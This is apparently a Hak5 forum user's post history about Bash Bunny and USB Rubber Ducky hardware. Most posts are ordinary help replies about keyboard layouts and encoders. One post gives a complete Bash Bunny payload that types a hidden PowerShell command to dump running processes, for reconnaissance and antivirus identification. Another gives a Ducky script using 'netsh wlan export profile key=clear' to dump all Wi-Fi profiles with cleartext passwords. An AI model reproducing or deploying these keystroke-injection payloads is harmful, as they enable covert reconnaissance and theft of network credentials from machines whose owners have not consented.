-
Posts
248 -
Joined
-
Last visited
-
Days Won
2
Everything posted by Decoy
-
Indeed, share! I just picked up one of these bad boys too: https://hakshop.com/collections/wireless-gear/products/long-range-wifi-kit
-
No worries. I wanted to make sure people could find it. That is an excellent payload.
-
I forgot about that. I just installed all the tools and everything when I first got the BB and never gave it much thought after that.
-
I'm pretty sure all of those keyboards are already available for the bash bunny, and I linked it as a reference only. So you can set to any of those languages as I've shown above, using the first 2 letters from each resource.
-
Like the hardware or the software? If they are Android phones, you can most likely root the devices, and play with some custom roms.
-
This is a link to the Rubber Ducky resources folder: https://github.com/hak5darren/USB-Rubber-Ducky/tree/master/Encoder/resources This will show you the available keyboard layouts.
-
If you're in the HID attack mode, you can set your keyboard like so: Q SET_LANGUAGE DE Or US, and so on, and so forth.
-
I think you might need to update the main GitHub link on your original post.
-
Yeah, I really didn't start playing around with or learning PowerShell until I got my Rubber Ducky. Easy to learn, and extremely effective.
-
This is just a quick and dirty payload to return all running processes under the current user. This will return the path/filename/version, and quite a bit of other info as well. This information can be useful for planning future attacks, such as taking advantage of buffer overflows, and other various vulnerabilities to gain a more permanent foothold into a target system. It can also be useful in identifying what AV is in use on a target system. An example of useful process info: Name : avpui Id : 724 PriorityClass : Normal FileVersion : 17.0.0.643 Path : C:\Program Files (x86)\Kaspersky Lab\Kaspersky Total Security 17.0.0\avpui.exe Company : AO Kaspersky Lab CPU : 85.875 ProductVersion : 17.0.0.643 Description : Kaspersky Anti-Virus Product : Kaspersky Anti-Virus https://github.com/DeeKoy/bashbunny-payloads/tree/master/payloads/library/ProcessInfo #!/bin/bash # # Title: Process Info # Author: Decoy # Version: 1.0 # Category: Recon # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Storage # # # Amber Blink Fast.....Initialization # Amber................Begin # White Blinking... ...Moving loot to mass storage # Blue Blinking........Syncing File System # Green................Finished # Initialization LED R G 100 # Create loot directory mkdir -p /root/udisk/loot/ProcessInfo # Runs minimized powershell gathering process information for potential future attack vectors LED R G ATTACKMODE HID STORAGE QUACK DELAY 6000 QUACK GUI r QUACK STRING "powershell -NoP -NonI -W Hidden" QUACK ENTER QUCK DELAY 1000 QUACK STRING "\$Bunny = (gwmi win32_volume -f 'label=\"BashBunny\"' | Select-Object -ExpandProperty DriveLetter); Get-Process | Format-List -Property * | Out-File \$Bunny\\loot\\ProcessInfo\\ProcessInfo.txt; exit" QUACK ENTER LED R G B 100 sleep 1 # Sync File System LED B 100 sync; sleep 1; sync # Trap is clean LED G
-
I'm pretty sure the payload already exists. Check this one out: Search the forums, you'll find a lot of payloads not officially published on the Wiki. Look at some examples, try playing with it. Good luck!
-
Doubtful. I don't think something like this can be done with network attack vectors. But someone can correct me if I'm wrong.
-
Yes you can. You might be better off using PowerShell for it, but you'd just navigate to the ducky directory prior to running netsh.
-
[SOLVED / Thanks Sebkinne!] Subforum for Payloads?
Decoy replied to LowValueTarget's topic in Bash Bunny
Awesome, it's definitely helpful. Thanks for creating this one for the Bunny! -
[SOLVED / Thanks Sebkinne!] Subforum for Payloads?
Decoy replied to LowValueTarget's topic in Bash Bunny
This actually wouldn't be a bad idea for the Ducky, LAN Turtle, and Pineapples as well. -
Check out this thread: https://forums.hak5.org/index.php?/topic/40581-bash-bunny-ducky-default-keyboard-language/
-
Why not dump all the profiles? Try this instead: DELAY 1000 GUI DELAY 200 ENTER STRING cmd ENTER DELAY 600 STRING netsh wlan export profile key=clear ENTER This will dump all profiles and clear text wifi passwords into an xml file in whatever directory you're currently in.
-
Is he really your Dad?
-
Check out the recent Hashcat episode of Hak5, it just came out a few weeks ago. One of the Hashcat developers talked about which cards he prefers.
-
[Bug Report] ARROW keys not working
Decoy replied to c0rruptedb1t's topic in Suggestions / Bug reports
That being said, I feel like using TABs and ARROWs can be hit or miss. It's too easy to have another process change focus, etc. I think the PowerShell line is the way to go. Another solution would be an ALT F4 combo. Good luck! -
[Bug Report] ARROW keys not working
Decoy replied to c0rruptedb1t's topic in Suggestions / Bug reports
I think all you should have to do is define the keyboard resource from the command line like this: java -jar duckencode.jar -i script.txt -o inject.bin -l resources/us.properties If that doesn't work, you can get the updated resources from GitHub. Let me know how it works out. -
[Payload Idea] Windows Task as System
Decoy replied to ThoughtfulDev's topic in Classic USB Rubber Ducky
Why did it get picked up by AV?- 9 replies
-
- windows
- usb rubber ducky
-
(and 2 more)
Tagged with: